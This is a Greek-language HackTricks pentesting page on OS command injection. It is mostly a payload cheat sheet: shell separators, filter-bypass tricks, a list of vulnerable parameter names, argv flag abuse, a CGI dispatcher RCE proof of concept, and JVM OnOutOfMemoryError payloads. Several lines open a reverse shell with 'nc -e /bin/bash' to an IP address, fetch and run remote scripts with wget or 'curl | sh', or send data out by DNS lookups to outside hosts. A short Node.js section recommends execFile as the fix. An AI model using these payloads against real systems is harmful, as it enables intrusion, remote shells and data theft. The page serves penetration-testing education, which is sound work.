Command Injection

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks

Τι είναι το command Injection?

Μια command injection επιτρέπει την εκτέλεση αυθαίρετων εντολών λειτουργικού συστήματος από έναν επιτιθέμενο στον διακομιστή που φιλοξενεί μια εφαρμογή. Ως αποτέλεσμα, η εφαρμογή και όλα της τα δεδομένα μπορούν να παραβιαστούν πλήρως. Η εκτέλεση αυτών των εντολών συνήθως επιτρέπει στον επιτιθέμενο να αποκτήσει μη εξουσιοδοτημένη πρόσβαση ή έλεγχο στο περιβάλλον της εφαρμογής και στο υποκείμενο σύστημα.

Πλαίσιο

Ανάλογα με το πού γίνεται η εισαγωγή της εισόδου σας, ίσως χρειαστεί να τερματίσετε το πλαίσιο που περιβάλλεται από εισαγωγικά (χρησιμοποιώντας " ή ') πριν από τις εντολές.

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
ls%0abash%09-c%09"id"%0a   # (Combining new lines and tabs)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition Παρακάμψεις

Αν προσπαθείτε να εκτελέσετε αυθαίρετες εντολές μέσα σε ένα linux σύστημα θα σας ενδιαφέρει να διαβάσετε για αυτές τις Παρακάμψεις:

Bypass Linux Restrictions

Παραδείγματα

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Εδώ είναι οι 25 κορυφαίες παράμετροι που θα μπορούσαν να είναι ευάλωτες σε code injection και παρόμοιες RCE ευπάθειες (από link):

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Time based data exfiltration

Εξαγωγή δεδομένων: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Βασισμένο στο εργαλείο από https://github.com/HoLyVieR/dnsbin που επίσης φιλοξενείται στο dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done

$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Διαδικτυακά εργαλεία για τον έλεγχο της DNS based data exfiltration:

  • dnsbin.zhack.ca
  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux

Bypass Linux Restrictions

Node.js child_process.exec vs execFile

Κατά τον έλεγχο backend υπηρεσιών γραμμένων σε JavaScript/TypeScript, συχνά θα συναντήσετε το Node.js child_process API.

// Vulnerable: user-controlled variables interpolated inside a template string
const { exec } = require('child_process');
exec(`/usr/bin/do-something --id_user ${id_user} --payload '${JSON.stringify(payload)}'`, (err, stdout) => {
/* … */
});

exec() δημιουργεί ένα shell (/bin/sh -c), επομένως οποιοσδήποτε χαρακτήρας που έχει ειδική σημασία για το shell (back-ticks, ;, &&, |, $(), …) θα οδηγήσει σε command injection όταν η είσοδος χρήστη ενσωματώνεται στη συμβολοσειρά.

Αντιμετώπιση: χρησιμοποιήστε execFile()spawn() χωρίς την επιλογή shell) και παρέχετε κάθε όρισμα ως ξεχωριστό στοιχείο πίνακα ώστε να μην εμπλέκεται το shell:

const { execFile } = require('child_process');
execFile('/usr/bin/do-something', [
'--id_user', id_user,
'--payload', JSON.stringify(payload)
]);

Real-world case: Synology Photos ≤ 1.7.0-0794 was exploitable through an unauthenticated WebSocket event that placed attacker controlled data into id_user which was later embedded in an exec() call, achieving RCE (Pwn2Own Ireland 2024).

Argument/Option injection via leading hyphen (argv, no shell metacharacters)

Δεν απαιτούν όλες οι injections shell metacharacters. Αν η εφαρμογή περνάει μη αξιόπιστες συμβολοσειρές ως ορίσματα σε ένα system utility (ακόμα και με execve/execFile και χωρίς shell), πολλά προγράμματα θα αναλύσουν οποιοδήποτε όρισμα που ξεκινά με - ή -- ως option. Αυτό επιτρέπει σε έναν επιτιθέμενο να αλλάξει λειτουργίες, να αλλάξει μονοπάτια εξόδου ή να ενεργοποιήσει επικίνδυνες συμπεριφορές χωρίς ποτέ να εισέλθει σε shell.

Τυπικά σημεία όπου εμφανίζεται:

  • Ενσωματωμένα web UIs/CGI handlers που κατασκευάζουν εντολές όπως ping <user>, tcpdump -i <iface> -w <file>, curl <url>, κ.λπ.
  • Κεντρικοί CGI routers (π.χ., /cgi-bin/<something>.cgi με παράμετρο selector όπως topicurl=<handler>) όπου πολλαπλά handlers επαναχρησιμοποιούν τον ίδιο αδύναμο validator.

Τι να δοκιμάσετε:

  • Προσφέρετε τιμές που ξεκινούν με -/-- ώστε να καταναλωθούν ως flags από το downstream tool.
  • Κακοχρησιμοποιήστε flags που αλλάζουν συμπεριφορά ή γράφουν αρχεία, για παράδειγμα:
    • ping: -f/-c 100000 για να επιβαρύνετε τη συσκευή (DoS)
    • curl: -o /tmp/x για να γράψετε αυθαίρετα μονοπάτια, -K <url> για να φορτώσετε διαμόρφωση ελεγχόμενη από επιτιθέμενο
    • tcpdump: -G 1 -W 1 -z /path/script.sh για να επιτύχετε εκτέλεση μετά-rotate σε μη ασφαλή wrappers
  • Αν το πρόγραμμα υποστηρίζει -- ως τέλος επιλογών, δοκιμάστε να παρακάμψετε αφελείς μετριασμούς που προθέτουν -- στο λάθος σημείο.

Generic PoC shapes against centralized CGI dispatchers:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

# Flip options in a downstream tool via argv injection
topicurl=<handler>&param=-n

# Unauthenticated RCE when a handler concatenates into a shell
topicurl=setEasyMeshAgentCfg&agentName=;id;

JVM diagnostic callbacks για guaranteed exec

Οποιοδήποτε primitive που σας επιτρέπει να inject JVM command-line arguments (_JAVA_OPTIONS, launcher config files, AdditionalJavaArguments fields in desktop agents, etc.) μπορεί να μετατραπεί σε αξιόπιστο RCE χωρίς να αγγίξετε το application bytecode:

  1. Force a deterministic crash μειώνοντας το metaspace ή το heap: -XX:MaxMetaspaceSize=16m (ή ένα πολύ μικρό -Xmx). Αυτό εγγυάται ένα OutOfMemoryError ακόμα και κατά την early bootstrap.
  2. Attach an error hook: -XX:OnOutOfMemoryError="<cmd>" ή -XX:OnError="<cmd>" εκτελεί μια αυθαίρετη OS εντολή όποτε ο JVM aborts.
  3. Προαιρετικά προσθέστε -XX:+CrashOnOutOfMemoryError για να αποφύγετε προσπάθειες ανάκτησης και να κρατήσετε το payload one-shot.

Example payloads:

-XX:MaxMetaspaceSize=16m -XX:OnOutOfMemoryError="cmd.exe /c powershell -nop -w hidden -EncodedCommand <blob>"
-XX:MaxMetaspaceSize=12m -XX:OnOutOfMemoryError="/bin/sh -c 'curl -fsS https://attacker/p.sh | sh'"

Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see Localhost WebSocket abuse) therefore translate directly into OS command execution.

Brute-Force Detection List

Auto_Wordlists/wordlists/command_injection.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Αναφορές

Tip

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Μάθετε & εξασκηθείτε στο Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Υποστηρίξτε το HackTricks